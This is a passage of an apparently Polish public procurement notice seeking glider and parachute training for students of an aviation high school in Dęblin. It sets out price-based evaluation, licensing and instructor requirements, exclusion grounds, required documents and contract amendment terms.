class="normal">100,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> X - Cena brutto oferty – waga 100 % Opis kryterium „cena brutto oferty”:Kryterium „cena brutto oferty” będzie rozpatrywane na podstawie ceny brutto oferty za przeprowadzenie teoretycznego i praktycznego szkolenia szybowcowego dla maksymalnie 16 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie – zaoferowanej w Formularzu ofertowym - Załączniku nr 1 do SIWZ. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą. Zamawiający ofercie o najniższej cenie przyzna 100 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru: X = (Cn : Cb) x 100 x 100% (ilość punktów)gdzie:X1 – ilość punktów uzyskanych w kryterium „cena brutto oferty ”Cn – najniższa cena brutto Cb – cena brutto oferty ocenianejMaksymalna suma punktów X, jaką może uzyskać wykonawca w zadaniu II wynosi 100 punktów.Według zamawiającego za najkorzystniejszą na daną część zamówienia ofertę uznana zostanie oferta, która spełni wszystkie wymagania niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższym wzorem (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów).Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. ZADANIE III - teoretyczne i praktyczne szkolenie szybowcowe dla maks. 18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie.2. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1b do SWZ.3.	Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu (zarówno szybowcowym jaki i spadochronowym) w wyniku wystąpienia okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu lub uczeń nie uzyskał 50% punktów z wychowania fizycznego Lotniczej Akademii Wojskowej a z zachowania otrzymał ocenę niższą niż dobry). Zamawiający zastrzega sobie również możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w przypadku braku zgody rodziców/opiekunów prawnych uczniów na udział w szkoleniu w związku z zagrożeniem związanym z trwającą epidemią COVID - 19. Z tego tytułu nie przysługują Wykonawcy wobec Zamawiającego żadne roszczenia w tym w szczególności roszczenia pieniężne. Zamawiający określa minimalny zakres zamówienia dla teoretycznego i praktycznego szkolenia: szybowcowego na poziomie 9 uczniów (ZADANIE III). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80412000-5 - Usługi szkół pilotażu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu (zarówno szybowcowym jaki i spadochronowym) w wyniku wystąpienia okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu lub uczeń nie uzyskał 50% punktów z wychowania fizycznego Lotniczej Akademii Wojskowej a z zachowania otrzymał ocenę niższą niż dobry). Zamawiający zastrzega sobie również możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w przypadku braku zgody rodziców/opiekunów prawnych uczniów na udział w szkoleniu w związku z zagrożeniem związanym z trwającą epidemią COVID - 19. Z tego tytułu nie przysługują Wykonawcy wobec Zamawiającego żadne roszczenia w tym w szczególności roszczenia pieniężne. Zamawiający określa minimalny zakres zamówienia dla teoretycznego i praktycznego szkolenia: szybowcowego na poziomie 9 uczniów (ZADANIE III). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-06-26 do 2021-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">X - cena brutto oferty – waga 100 % Opis kryterium „cena brutto oferty”:Kryterium „cena brutto oferty” będzie rozpatrywana na podstawie ceny brutto oferty za przeprowadzenie teoretycznego i praktycznego szkolenia szybowcowego dla maks. 18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie przeprowadzonego zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) zatwierdzonym przez Urząd Lotnictwa Cywilnego – zaoferowanej w Formularzu ofertowym - Załączniku nr 1 do SIWZ. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. 2019 poz. 178 z późn. zm.). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą. Zamawiający ofercie o najniższej cenie przyzna 100 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru: X = (Cn : Cb) x 100 x 100% (ilość punktów)gdzie:X – ilość punktów uzyskanych w kryterium „cena brutto oferty ”Cn – najniższa cena brutto Cb – cena brutto oferty ocenianejMaksymalna suma punktów X, jaką może uzyskać wykonawca w zadaniu III wynosi 100 punktów.Według zamawiającego za najkorzystniejszą na daną część zamówienia ofertę uznana zostanie oferta, która spełni wszystkie wymagania niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższym wzorem (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów). Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> X - cena brutto oferty – waga 100 % Opis kryterium „cena brutto oferty”:Kryterium „cena brutto oferty” będzie rozpatrywana na podstawie ceny brutto oferty za przeprowadzenie teoretycznego i praktycznego szkolenia szybowcowego dla maks. 18 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie przeprowadzonego zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) zatwierdzonym przez Urząd Lotnictwa Cywilnego – zaoferowanej w Formularzu ofertowym - Załączniku nr 1 do SIWZ. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. 2019 poz. 178 z późn. zm.). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą. Zamawiający ofercie o najniższej cenie przyzna 100 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru: X = (Cn : Cb) x 100 x 100% (ilość punktów)gdzie:X – ilość punktów uzyskanych w kryterium „cena brutto oferty ”Cn – najniższa cena brutto Cb – cena brutto oferty ocenianejMaksymalna suma punktów X, jaką może uzyskać wykonawca w zadaniu III wynosi 100 punktów.Według zamawiającego za najkorzystniejszą na daną część zamówienia ofertę uznana zostanie oferta, która spełni wszystkie wymagania niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższym wzorem (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów). Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:1.1.	zdolności do występowania w obrocie gospodarczym:Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: W celu wykazania spełnienia warunku posiadania uprawnień do prowadzenia określonej działalności zawodowej, wykonawca winien wykazać się posiadaniem:a)	ZADANIE I - teoretyczne i praktyczne szkolenie spadochronowe- ważnego zaświadczenia o wpisie do Rejestru Podmiotów Szkolących wydanego przez Urząd Lotnictwa Cywilnego uprawniającego do przeprowadzenia szkolenia spadochronowego teoretycznego i praktycznego do świadectwa kwalifikacji skoczka spadochronowego PJ(B) +SL, zgodnie z ”Programem szkolenia do uzyskania świadectwa kwalifikacji skoczka spadochronowego (PJ) z uprawnieniem klasy wyszkolenia B– szkolenie metodą na linę (SL)”, uzgodnionym przez Urząd Lotnictwa Cywilnego;- zaświadczenia wystawionego przez Urząd Lotnictwa Cywilnego, że wobec Wykonawcy nie zostało wszczęte postępowanie o zawieszeniu lub cofnięciu uprawnień do przeprowadzenia szkolenia spadochronowego teoretycznego i praktycznego do świadectwa kwalifikacji skoczka spadochronowego PJ(B) +SL, zgodnie z ”Programem szkolenia do uzyskania świadectwa kwalifikacji skoczka spadochronowego (PJ) z uprawnieniem klasy wyszkolenia B – szkolenie metodą na linę (SL)” b)	ZADANIE II i ZADANIE III– teoretyczne i praktyczne szkolenie szybowcowe- ważnego dokumentu: „Certyfikatu dla zatwierdzonej organizacji szkolenia lotniczego” – certyfikatu ATO (Approved Training Organizations) uprawniającego do przeprowadzania teoretycznego i praktycznego szkolenia do licencji pilota szybowcowego – SPL wydanego przez Urząd Lotnictwa Cywilnego; izaświadczenia wystawionego przez Urząd Lotnictwa Cywilnego, że wobec Wykonawcy nie zostało wszczęte postępowanie o zawieszeniu lub cofnięciu uprawnień do realizacji przedmiotu umowylub- Deklaracji DTO (Declared Training Organisation) z nadanym numerem referencyjnym dla tej deklaracji przez Prezesa Urzędu Lotnictwa Cywilnego, zezwalającej na prowadzenie szkolenia szybowcowego do licencji pilota szybowcowego SPL w zakresie teoretycznym i praktycznym;izaświadczenia, że nie zostało wszczęte postępowanie przez Urząd Lotnictwa Cywilnego o zawieszeniu lub cofnięciu decyzji o nadaniu deklaracji DTO. 1.3. Sytuacji ekonomicznej lub finansowej:Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.1.4. Zdolności technicznej lub zawodowej:a)	ZADANIE I - teoretyczne i praktyczne szkolenie spadochronoweWarunek zdolności technicznej lub zawodowej - pozwalającej na wykonanie przedmiotu zamówienia zostanie spełniony, jeżeli wykonawca wykaże, że: - w okresie ostatnich 3 (trzech) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonuje co najmniej (1) jedną usługę w zakresie: szkolenia spadochronowego teoretycznego i praktycznego zgodnie z jednym z programów szkolenia do uzyskania świadectwa kwalifikacji skoczka spadochronowego (PJ), uzgodnionym przez Urząd Lotnictwa Cywilnego - na łączną kwotę już zrealizowanych usług minimum 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie, oraz załączeniem dowodów, określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;W przypadku, gdy wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich Zamawiający dokona przeliczenia tej wartości na złote polskie – na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.- posiada w swoich zasobach kadrowych minimum dwóch instruktorów szkolenia spadochronowego z ważnymi uprawnieniami instruktora spadochronowego INS(SL) wydanymi przez Urząd Lotnictwa Cywilnego (licencje lub świadectwo kwalifikacji) oraz instruktorzy Ci posiadają minimum 3-letnie doświadczenie w pracy instruktorskiej. b)	ZADANIE II i ZADANIE III– teoretyczne i praktyczne szkolenie szybowcoweWarunek zdolności technicznej lub zawodowej - pozwalającej na wykonanie przedmiotu zamówienia zostanie spełniony, jeżeli wykonawca wykaże, że: - w okresie ostatnich 3 (trzech) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonuje co najmniej (1) jedną usługę w zakresie: szkolenia szybowcowego praktycznego zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) uzgodnionym przez Urząd Lotnictwa Cywilnego - na łączną kwotę już zrealizowanych usług minimum 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie, oraz załączeniem dowodów, określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.W przypadku składania oferty na ZADANIE II i ZADANIE III wystarczy wykazać wykonanie lub wykonywanie usługi szkolenia praktycznego szybowcowego na łączną kwotę już zrealizowanych usług minimum 50.000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych). Jedno zamówienie oznacza usługę wykonaną/wykonywaną na podstawie jednej umowy.	W przypadku, gdy wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich Zamawiający dokona przeliczenia tej wartości na złote polskie – na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej.- posiada w swoich zasobach kadrowych minimum jednego instruktora szkolenia szybowcowego teoretycznego posiadającego uprawnienia wydane przez Urząd Lotnictwa Cywilnego (licencje pilota szybowcowego – SPLz uprawnieniami instruktora) oraz min. 3-letnie doświadczenie w pracy instruktorskiej;- posiada w swoich zasobach kadrowych minimum dwóch instruktorów szkolenia szybowcowego praktycznego posiadającego uprawnienia wydane przez Urząd Lotnictwa Cywilnego (licencje pilota szybowcowego – SPL z uprawnieniami instruktora) oraz min. 3-letnie doświadczenie w pracy instruktorskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych potwierdzających: brak podstaw do wykluczenia Wykonawcy.3.3.	W zakresie potwierdzenia braku podstaw do wkluczenia wykonawcy z postępowania zamawiający zażąda:a)	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp Wzór oświadczenia stanowi załącznik nr 3 do SWZ; b)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp; c)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: - art. 108 ust. 1 pkt 3 ustawy, - art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, - art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, Znak sprawy: ZP/21/2021 str. 8 - art. 108 ust. 1 pkt 6 ustawy, - art. 109 ust. 1 pkt 2 ustawy,- art. 109 ust. 1 pkt 4 ustawy. Wzór oświadczenia stanowi załącznik nr 7 do SWZ; UWAGA: W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna), dokumenty, o których mowa w pkt. 3.3. składane będą przez każdego partnera konsorcjum/ wspólnika spółki cywilnej.4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 3.3. ppkt. b) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty, o których mowa w zdaniu poprzedzającym powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. 5.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 4, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art., 109 ust. 1 pkt 1 ustawy Pzp zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych potwierdzających: spełnianie warunków udziału w postępowaniu:3.1.	W zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego:a)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający zażąda:- ważnego zaświadczenia o wpisie do Rejestru Podmiotów Szkolących wydanego przez Urząd Lotnictwa Cywilnego uprawniającego do przeprowadzenia szkolenia spadochronowego teoretycznego i praktycznego do świadectwa kwalifikacji skoczka spadochronowego PJ(B) +SL, zgodnie z „Programem szkolenia do uzyskania świadectwa kwalifikacji skoczka spadochronowego (PJ) z uprawnieniem klasy wyszkolenia B– szkolenie metodą na linę (SL)”, uzgodnionym przez Urząd Lotnictwa Cywilnego;- zaświadczenia wystawionego przez Urząd Lotnictwa Cywilnego, że wobec Wykonawcy nie zostało wszczęte postępowanie o zawieszeniu lub cofnięciu uprawnień do przeprowadzenia szkolenia spadochronowego teoretycznego i praktycznego do świadectwa kwalifikacji skoczka spadochronowego PJ(B) +SL, zgodnie z ”Programem szkolenia do uzyskania świadectwa kwalifikacji skoczka spadochronowego (PJ) z uprawnieniem klasy wyszkolenia B – szkolenie metodą na linę (SL)b)	posiadania zdolności technicznej lub zawodowej Zamawiający zażąda:- wykazu usług wykonanych. Z przedłożonego wykazu musi wynikać, że wykonawca należycie wykonał co najmniej (1) jedną usługę w zakresie: szkolenia spadochronowego teoretycznego i praktycznego zgodnie z jednym z programów szkolenia do uzyskania świadectwa kwalifikacji skoczka spadochronowego (PJ), uzgodnionym przez Urząd Lotnictwa Cywilnego - na łączną kwotę już zrealizowanych usług minimum 30.000,00 zł brutto (słownie: trzydzieści tysięcy złotych)- wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego. W wykazie Wykonawca wykaże się osobami, które muszą być dostępne na etapie realizacji zamówienia. Zamawiający wymaga:- minimum dwóch instruktorów szkolenia spadochronowego z ważnymi uprawnieniami instruktora spadochronowego INS(SL) wydanymi przez Urząd Lotnictwa Cywilnego (licencje lub świadectwo kwalifikacji) oraz posiadającymi minimum 3-letnie doświadczenie w pracy instruktorskiej. Dotyczy ZADANIA II i ZADANIA III:3.2.	W zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego:a)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający zażąda:- ważnego dokumentu: „Certyfikatu dla zatwierdzonej organizacji szkolenia lotniczego” – certyfikatu ATO (Approved Training Organizations) uprawniającego do przeprowadzania teoretycznego i praktycznego szkolenia do licencji pilota szybowcowego – SPL wydanego przez Urząd Lotnictwa Cywilnego;izaświadczenia wystawionego przez Urząd Lotnictwa Cywilnego, że wobec Wykonawcy nie zostało wszczęte postępowanie o zawieszeniu lub cofnięciu uprawnień do realizacji przedmiotu umowy lub- Deklaracji DTO (Declared Training Organisation) z nadanym numerem referencyjnym dla tej deklaracji przez Prezesa Urzędu Lotnictwa Cywilnego, zezwalającej na prowadzenie szkolenia szybowcowego do licencji pilota szybowcowego SPL w zakresie teoretycznym i praktycznym;izaświadczenia, że nie zostało wszczęte postępowanie przez Urząd Lotnictwa Cywilnego o zawieszeniu lub cofnięciu decyzji o nadaniu deklaracji DTO. Informacja o podmiotowych środkach dowodowych została szczegółowo opisana w Rozdziale VII SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta powinna zawierać następujące dokumenty w postaci elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, przez osoby upoważnione: 1)	formularz ofertowy, zawierający wszystkie informacje zawarte we wzorze stanowiącym Załącznik nr 1 do SWZ; 2)	pełnomocnictwo udzielane osobom podpisującym ofertę lub inne dokumenty składane z ofertą, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych lub bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczył dane umożliwiające dostęp do tych dokumentów; 3)	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy); 4)	oświadczenia wymagane do przedstawienia na etapie składania ofert, o których mowa w Rozdziale VII Etap I SWZ tj.;ocena wstępna ofert, której poddawani są wszyscy Wykonawcy. Każdy Wykonawca zobowiązuje się dołączyć do ofertya)	Formularz ofertowy;b)	Oświadczenie o spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego Załącznik nr 2c do SWZ);c)	Oświadczenie o niepodleganiu wykluczeniu (wg wzoru stanowiącego Załącznik nr 2a do SWZ)d)	W przypadku Oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna), wymóg złożenia oświadczeń, o których mowa w pkt. 1 ppkt. b) i c) dotyczy każdego partnera konsorcjum/ wspólnika spółki cywilnej;e)	w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniami, o którym mowa w pkt. 1 ppkt. b) i c), także oświadczenie podmiotu udostępniającego zasoby (wg wzoru 2b i/lub 2d do SWZ), potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.5)	oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, o ile dotyczy, zgodnie ze wzorem określonym w załączniku nr 9 SWZ. 6)	uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa, o ile dotyczą; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego:a) W przypadku Oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna), wymóg złożenia oświadczeń, o których mowa w Rozdziale VII pkt. 1 ppkt. b) i c) dotyczy każdego partnera konsorcjum/ wspólnika spółki cywilnej;b) warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej określony w SWZ w Rozdziale V pkt. 1 ppkt. 1.2 zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje usługi do których realizacji te uprawnienia są wymagane;c) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia określonych w SWZ w Rozdziale V pkt. 1.4 wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane;d) w przypadku opisanym powyżej ppkt. b) i c) wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy - wzór oświadczenia stanowi załącznik Nr 9 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza wprowadzenie zmian Umowy w zakresie poniżej wskazanym, w szczególności w przypadku gdy konieczność wprowadzenia takich zmian wynikałaby z okoliczności, których nie można było przewidzieć w chwili zawierania Umowy: 1) zmiany terminu wykonania Umowy – gdy z powodu działania siły wyższej nie jest możliwe wykonanie przedmiotu Umowy w umówionym terminie, bądź gdy niewykonanie Umowy w terminie wyniknie z przyczyn leżących po stronie Zamawiającego lub ……. 2) przedłużenia terminu wykonania Umowy, o okres nie dłuższy niż okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą oraz sądem powszechnym, w przypadku, gdy zostało wniesione odwołanie w postępowaniu o udzielenie zamówienia 